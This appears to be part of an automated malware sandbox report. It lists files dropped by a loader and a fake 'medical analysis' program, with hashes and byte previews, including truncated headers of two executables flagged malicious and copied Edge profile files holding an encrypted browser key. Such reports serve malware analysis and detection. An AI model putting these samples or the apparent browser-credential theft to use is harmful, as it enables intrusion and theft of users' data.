                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\slf4j-api.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41203
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.855219741633254
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:CkwPhOR4PpSvw6vob5IJ9eoYUx7eBr9HDhzCZ+8ylnm1fjiUNcS5cXeK/7DaeR7g:CRPhOR4B0reWJYURuHN4ylnaeSI4
                                                                                                                                                                                                                                                                                                              MD5:CAAFE376AFB7086DCBEE79F780394CA3
                                                                                                                                                                                                                                                                                                              SHA1:DA76CA59F6A57EE3102F8F9BD9CEE742973EFA8A
                                                                                                                                                                                                                                                                                                              SHA-256:18C4A0095D5C1DA6B817592E767BB23D29DD2F560AD74DF75FF3961DBDE25B79
                                                                                                                                                                                                                                                                                                              SHA-512:5DD6271FD5B34579D8E66271BAB75C89BACA8B2EBEAA9966DE391284BD08F2D720083C6E0E1EDDA106ECF8A04E9A32116DE6873F0F88C19C049C0FE27E5D820B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK..........pJ................META-INF/PK..........pJ..w0?...........META-INF/MANIFEST.MF}._O.0....;.....J2....a..F.o.v..tm.....&c..q.w.9'..Q..Y...q%..%.........x.`.g..|ol.ZH......l.hF...7...............Gw..2..'.1..<..F&../4.O..V......4..R....k...*.<.Un..h....ZR...B..Kn..u.L5o..~.kl{.........xJ......d.L...~D..O.Y.w..$..X.r...FI.3@Q/.q.>.ke,.S....C...|.:.C]...L...{.....K.....m.D.&..Cx.qk...j...PK........J.pJ................org/PK..........pJ................org/slf4j/PK..........pJ................org/slf4j/event/PK..........pJ................org/slf4j/helpers/PK..........pJ................org/slf4j/spi/PK..........pJ...^]...+...$...org/slf4j/event/EventConstants.class}.MO.@...........=.x...!!%i......6i../O&....(.l.../.y.wvf..........8..$..C...C}..F...P..^(LOLL7.Ir4.r.-].5...k....].=._...#.....CkM.q.[*...0U..l.......N.27..[.d.|......4p<.E/..F..r..g.;1.G.RL.g'd....VC..z......q.S.dP.?.f..H[.........'....Ck.g..i-..P8".|..6.p...+dp..........5..+k.A\X."..........e

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\slf4j-simple.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15257
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.804568217256536
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:wyBOIrDL/vJ0RWNML2NyWKr362ByOikGnqO5Vyb3Uab+UtJIdgihtqSXs:wyBnxxMLg7KrqU7Gnqrb3lhtuF/qS8
                                                                                                                                                                                                                                                                                                              MD5:722BB90689AECC523E3FE317E1F0984B
                                                                                                                                                                                                                                                                                                              SHA1:8DACF9514F0C707CBBCDD6FD699E8940D42FB54E
                                                                                                                                                                                                                                                                                                              SHA-256:0966E86FFFA5BE52D3D9E7B89DD674D98A03EED0A454FBAF7C1BD9493BD9D874
                                                                                                                                                                                                                                                                                                              SHA-512:D5EFFBFA105BCD615E56EF983075C9EF0F52BCFDBEFA3CE8CEA9550F25B859E48B32F2EC9AA7A305C6611A3BE5E0CDE0D269588D9C2897CA987359B77213331D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK..........pJ................META-INF/PK..........pJ.T..N...........META-INF/MANIFEST.MFuR]O.0.}_....`. ........%...L...............{>.97...6..^..L..u........e<..5:..3V@..xt..0#t.hF...3..7..U........Ww`.".'..b.)wDo.~.".f......f6.....XZ......?.X..;J#.+.8..Z..Z...i@-.%3.|.....u..N4;.....%g...g..R7....D,.......u..3..b.-I.j...{......))l....(.e.`.Ie...I.NR%^.fC<.U.......w....6.:.=[..........$.*..2.Yjsu....PK........K.pJ................org/PK........K.pJ................org/slf4j/PK........K.pJ................org/slf4j/impl/PK........K.pJ.._.........#...org/slf4j/impl/OutputChoice$1.class..mO.P...w+.6+..4yP.....t........f. 1. ]w..v.Z.O.k51..>.o.F.s..$(.I.?.wn.97.......@..,.c&.,f3.....qC.M!.Bn..-cQ.........5(.A.0t.T...`...Q8..Z.wl~.Z...!..`H?.].s.g..bi.A...Z.2..oE.m....K.....k....`..c.3.......|3.{u...=....C.....uG$L.....^.g....<.....2.........`UA.....[)./>..y .!V..i(Z<.M.E;1.........Z.!.2....v..!...E.V.jqz...P..r#.R,...)G....~s..P>w..t..r..o.....&k.....?.q3..0

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt658\zt-zip.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):105007
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.8886535210991395
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:Dxpeuv7xOoWmvqcQurq8vGDTRAi5yRdPPl/CJqM9ggS3OIrBTH6x0:Fguv7cfmJrUOiYRbXMbS3Ooox0
                                                                                                                                                                                                                                                                                                              MD5:0FD8BC4F0F2E37FEB1EFC474D037AF55
                                                                                                                                                                                                                                                                                                              SHA1:ADD8FFACE4C1936787EB4BFFE4EA944A13467D53
                                                                                                                                                                                                                                                                                                              SHA-256:1E31EF3145D1E30B31107B7AFC4A61011EBCA99550DCE65F945C2EA4CCAC714B
                                                                                                                                                                                                                                                                                                              SHA-512:29DE5832DB5B43FDC99BB7EA32A7359441D6CF5C05561DD0A6960B33078471E4740EE08FFBD97A5CED4B7DD9CC98FAD6ADD43EDB4418BF719F90F83C58188149
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK.........E?J................META-INF/PK.........E?J&.x~i...........META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,J..,K-B...V..+.$x...R.KRSt.*......3R.|..R.x..J3sJ..%.....E...]..l...z.....\.\.PK.........E?J................org/PK.........E?J................org/zeroturnaround/PK.........E?J................org/zeroturnaround/zip/PK.........E?J................org/zeroturnaround/zip/commons/PK.........E?J................org/zeroturnaround/zip/extra/PK.........E?J............"...org/zeroturnaround/zip/timestamps/PK.........E?J............!...org/zeroturnaround/zip/transform/PK.........E?J............'...org/zeroturnaround/zip/ByteSource.class.U.W.U..6.l..B.7...`H..`.-.. ..g[(.b.%....q...../..G_.9.<rN.Oz...?.77.4=.;s....|w....}..2.60.....#..........!.,.X....$r".x ...?.....-x(bU.#...X...@..u|b...8...4..D.....#...d...Z.w..V.`.......&4D7.|..!.>IG..5h..^..%......`...&.9..y....N..oj.L...>9.J.)w.X..N.^..n...Q.%.7o.V-.y`l...fqq..........hyn....wJ.If..V...........r..]..Z....1..5...

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):93696
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.714493816202374
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:V6DdyQDw4KX9wG0ess6PHZGwZAnK+dJr/eXYvJGrm4M/4YyUM:oVcwKD6PHMOAKVXYvJCm4M/Ryl
                                                                                                                                                                                                                                                                                                              MD5:443B43ADCB78164D40C977ABAC54C18E
                                                                                                                                                                                                                                                                                                              SHA1:84E8738D90770806B8533E5A412FEAB161DE2382
                                                                                                                                                                                                                                                                                                              SHA-256:8E2EC352E0EC1212011FEFD1ABE73FCBBCE42BEC907525922BA7C64EAF26BA24
                                                                                                                                                                                                                                                                                                              SHA-512:80232FC1C89066BA24F22AAAF00FB49BA13917C938C4B8B64933617EE3DE844BE2CD3A9DC2426DA846750A1AF50E933B553DC5A5C4DBB2D33332FF202532F8D1
                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....^g.................d............... ........@.. ....................................`....................................K.................................................................................... ............... ..H............text...$c... ...d.................. ..`.rsrc................f..............@..@.reloc...............l..............@..B........................H.......`...d............................................................*...(....*..(....*..0..O....... ........8........E..../.......8*...r...p(....& ....~....{....:....& ....8....*.&~.......*...~....*..(....(....*.0..[....... ........8........E........................'...8....... ....~....{....:....& ....8...........o...... ....~....{....:....& ....8........E....+...............8&...s...... ....~....{....9....& ....8..........s...... ....~....{....:....& ....8........E....

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.720210063776194
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:7cJtQnNnab3OwLhAETjZn8eAemp/wDmrDpz+spCl:7cJinNab3ZSkjZn8eAfp/wDqljpCl
                                                                                                                                                                                                                                                                                                              MD5:2DBC39DCE4C3B66019E84A28A342EAD0
                                                                                                                                                                                                                                                                                                              SHA1:7AB924FE7875C17BFA2700678833C612C487441B
                                                                                                                                                                                                                                                                                                              SHA-256:DDCFD38B862FDB8E8BD1C34B7D1FD3928E1A5EDABE0CB4A627717FC89F5F6186
                                                                                                                                                                                                                                                                                                              SHA-512:D4AB406B5D85D42C1572D4E23DC71342EEAF1473A56045BE0189AF8946C99E70A274FAAB6135A1B08205422B31B4917A45146674FDF895A115CE96F7D76E84F6
                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@...............0..Z...........x... ........@.. ....................................@..................................w..O....................................w............................................... ............... ..H............text....X... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B.................w......H........8..@4...........l...............................................0..........(....o.....+g..(......o,....o....(......o,....o0...(....o.....+...(.........(......&....(....-...........o.......&....(....-...........o.....*...4....I..S........>.#a..........\q..........t........0..E.......r...p(......(....,.r...p(......(....-..( ...%-.&.*..0...%..\.(!...*.*....0..........s"..........%.(....r%..p(#....%..*($....s%...%rC..p..($...rc..prs..p(&...o'...%r...p..($...r...p((...o'.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpE968.tmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2540
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.801552142126602
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:CDAZse4GVajjgsrMM7wEIyxduDwLHXsZ5z/C2iJQ7sKXhVFm1:C+sfGEjgsgM7lIKuK3qB6HJQ7BFm
                                                                                                                                                                                                                                                                                                              MD5:CBC6B2AD4BF883EA7ECB41D8D86B0964
                                                                                                                                                                                                                                                                                                              SHA1:3051043976773ABFC145A23942B42E4C7CAC5A1C
                                                                                                                                                                                                                                                                                                              SHA-256:C8844BA7CA7DF3C75532044792065C3D2B742C389FC9FA1A6E2776ED425917AF
                                                                                                                                                                                                                                                                                                              SHA-512:355B1E180D067ABAAB69F1F51CF0776DEE7156156195094825A1BA7FAC3BCF7AB303B5D68BE373878F400CD34EC9061DC549706B8AD344E66AC8968DAA7E812F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:0......0.....*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0........J..........+"J.).V9...,...:'.......>.i..$V.Y.R..w......?)fA....l..B.I....W....d}.uw..),}.-..S......Z.fM.%<.R..Ln.<.U.]]....m.QS..R4..T.....)s>.(@.<C...>.../.F............|.i.:.._..1...@ns.<...!....O.'g.<X*.........ctf.=.........4.......?e......G}..N~.>P.....A^.e...8.*]..Z...l-se....g ..M;....@w....G...E...)...\.}W.lP...z..X.J..%!I..F&l....Kc.Ve$;........!.]..\...r..)..B.....< .>>.5O{%..$.....?..\.7.&.......r....5 :.k......s-S.{z.pZ...QY0.tV0....H.....0.8..Jf..V..W?.....v.).k$ag.J3f"..t...3)....v............v.j}.)4j.^r..r.....n._"o.j..t0.W......O.zH...6.$..).gd...Z.b..40..M.f...A....C....v.w..}.....r.3.e..5..9..|.9N..{rCN{..6.k..W.........h.w.uEQR.AQI@-l..+....J_....s{.....}2p.......O.E.....}.76".x6.,.M./.8.u.....WM..*....?..%.....\@mU.Kr....]......{..#*...A.).........E.`..q..E............o..5...f...wR...H.9.z..|q....0.uI....

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpE988.tmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2540
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.801552142126602
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:CDAZse4GVajjgsrMM7wEIyxduDwLHXsZ5z/C2iJQ7sKXhVFm1:C+sfGEjgsgM7lIKuK3qB6HJQ7BFm
                                                                                                                                                                                                                                                                                                              MD5:CBC6B2AD4BF883EA7ECB41D8D86B0964
                                                                                                                                                                                                                                                                                                              SHA1:3051043976773ABFC145A23942B42E4C7CAC5A1C
                                                                                                                                                                                                                                                                                                              SHA-256:C8844BA7CA7DF3C75532044792065C3D2B742C389FC9FA1A6E2776ED425917AF
                                                                                                                                                                                                                                                                                                              SHA-512:355B1E180D067ABAAB69F1F51CF0776DEE7156156195094825A1BA7FAC3BCF7AB303B5D68BE373878F400CD34EC9061DC549706B8AD344E66AC8968DAA7E812F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:0......0.....*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0........J..........+"J.).V9...,...:'.......>.i..$V.Y.R..w......?)fA....l..B.I....W....d}.uw..),}.-..S......Z.fM.%<.R..Ln.<.U.]]....m.QS..R4..T.....)s>.(@.<C...>.../.F............|.i.:.._..1...@ns.<...!....O.'g.<X*.........ctf.=.........4.......?e......G}..N~.>P.....A^.e...8.*]..Z...l-se....g ..M;....@w....G...E...)...\.}W.lP...z..X.J..%!I..F&l....Kc.Ve$;........!.]..\...r..)..B.....< .>>.5O{%..$.....?..\.7.&.......r....5 :.k......s-S.{z.pZ...QY0.tV0....H.....0.8..Jf..V..W?.....v.).k$ag.J3f"..t...3)....v............v.j}.)4j.^r..r.....n._"o.j..t0.W......O.zH...6.$..).gd...Z.b..40..M.f...A....C....v.w..}.....r.3.e..5..9..|.9N..{rCN{..6.k..W.........h.w.uEQR.AQI@-l..+....J_....s{.....}2p.......O.E.....}.76".x6.,.M./.8.u.....WM..*....?..%.....\@mU.Kr....]......{..#*...A.).........E.`..q..E............o..5...f...wR...H.9.z..|q....0.uI....

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gbfeerr.ge0.ps1

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz4fitm3.vmq.psm1

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxorwvrg.e3g.psm1

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xamsm0x0.wg4.ps1

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\8af2d221-f740-41e1-80c8-fb99791850be.tmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1371
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.529436301618216
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:YpQBqDPak7u5rrtLkMbFPB6Fr6yik9JdXBuBuwBFayPnNhR+XcQQQRCYfYg:YuBqDPafWMbFPTUgBzBFDPzR+sFB0
                                                                                                                                                                                                                                                                                                              MD5:B15A20CBDC1E4DAC9EABEB4E7F63F840
                                                                                                                                                                                                                                                                                                              SHA1:1CA549A63831F0B1015A4F3100CBDD57BC194CC5
                                                                                                                                                                                                                                                                                                              SHA-256:B4A340E11B8DC9FA9EA5FD8EDDDEFF4FD9032551719764C2A82E40CF930BE91E
                                                                                                                                                                                                                                                                                                              SHA-512:93E14403555ECEA53E4B1263E7A416D63D65827ADD036381AE98D4222381FD7ADABB2514B555E855AEC244F694E5A3726BDC0EC073AB5D4702827D6D85672BC6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADD+MzJT60RQbZUlvEJS6UzEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAChodJ9YpuT7JUIrAQi2XE7whngfvq6u/zFwrj4wShr+QAAAAAOgAAAAAIAACAAAADCfcV7Fqc8oAXu4qM4jG4E1ghesDl1MZmDO5uGvnCa8DAAAADJDpmHavXJxw0JmhKAiUv43NamMZBG6kMmwn9xE6c5ug1CYVKLyC3HtQLVGm9lv41AAAAAWZRcA3EYXl677lvyCjcshgv0xIlWsY2FTnzWymDeCRAUlDOxXE1DIKf7XmppLGsD2obA53Q5NkKg9NTZl3vRJw=="},"profile":{"info_cache":{},"profile_counts_reported":"13379381692285050","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734908090"},"user_experienc

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\8c5a3523-ede4-42c2-b4cf-c7ef61f9f279.tmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3281
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.590185824541608
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:0q8NkC1fWMbFPWQPcBGWsv7jOQ6Jk2ceSDS4S4SDSJI4a:/8Nb/bApTQ2k2x
                                                                                                                                                                                                                                                                                                              MD5:480EC7BB3DE7EA884E50AA5A26EE377F
                                                                                                                                                                                                                                                                                                              SHA1:B62CC0E5A73A3352F81D00A6B605B971994942CC
                                                                                                                                                                                                                                                                                                              SHA-256:0A5EFE1046EF3934F79B718C5D28C36F8E22A388F3ABCE718C9B413400E3A49C
                                                                                                                                                                                                                                                                                                              SHA-512:7A35F2AEAFAE5B38466C2AB32475BC1BABC65AE1B1B0BE0334145E745A43BA49031346DEA2CCD45A221B52FF61FA225860FB7D5B3FA46BE235047A99D1138475
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADD+MzJT60RQbZUlvEJS6UzEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAChodJ9YpuT7JUIrAQi2XE7whngfvq6u/zFwrj4wShr+QAAAAAOgAAAAAIAACAAAADCfcV7Fqc8oAXu4qM4jG4E1ghesDl1MZmDO5uGvnCa8DAAAADJDpmHavXJxw0JmhKAiUv43NamMZBG6kMmwn9xE6c5ug1CYVKLyC3HtQLVGm9lv41AAAAAWZRcA3EYXl677lvyCjcshgv0xIlWsY2FTnzWymDeCRAUlDOxXE1DIKf7XmppLGsD2obA53Q5NkKg9NTZl3vRJw=="},"policy":{"last_statist

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\BrowserMetrics\BrowserMetrics-676898BA-1298.pma

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 512-0, spot sensor temperature 0.000000, unit celsius, color scheme 1, maximum point enabled, calibration: offset 0.000000, slope 2417851639229258349412352.000000
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.219830469972604
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:dmuOVzDPXYcQiqRGyWTfjkcRGg1DRFF7qSRGRRZp0z7:dmBV/PXYcjjZTfjkpg1HF7qb3Iz
                                                                                                                                                                                                                                                                                                              MD5:61A5C0C83495B5378C3748D23055F795
                                                                                                                                                                                                                                                                                                              SHA1:7AE585A993171D43C6889EA038A0412D05E69390
                                                                                                                                                                                                                                                                                                              SHA-256:CD8268A697250A3A579DF048BD321C28DFAC714F37095B9284003EB935DE6554
                                                                                                                                                                                                                                                                                                              SHA-512:9E7AAE29C69B90CA7AD9B7F307B65304A16B8198FA2E012F697EDF176072EDC39F4D7C9561FBEF7AC2DCF10289E6328FAF923B7A1C7953CE0146D853E91A9D09
                                                                                                                                                                                                                                                                                                              Malicious:false
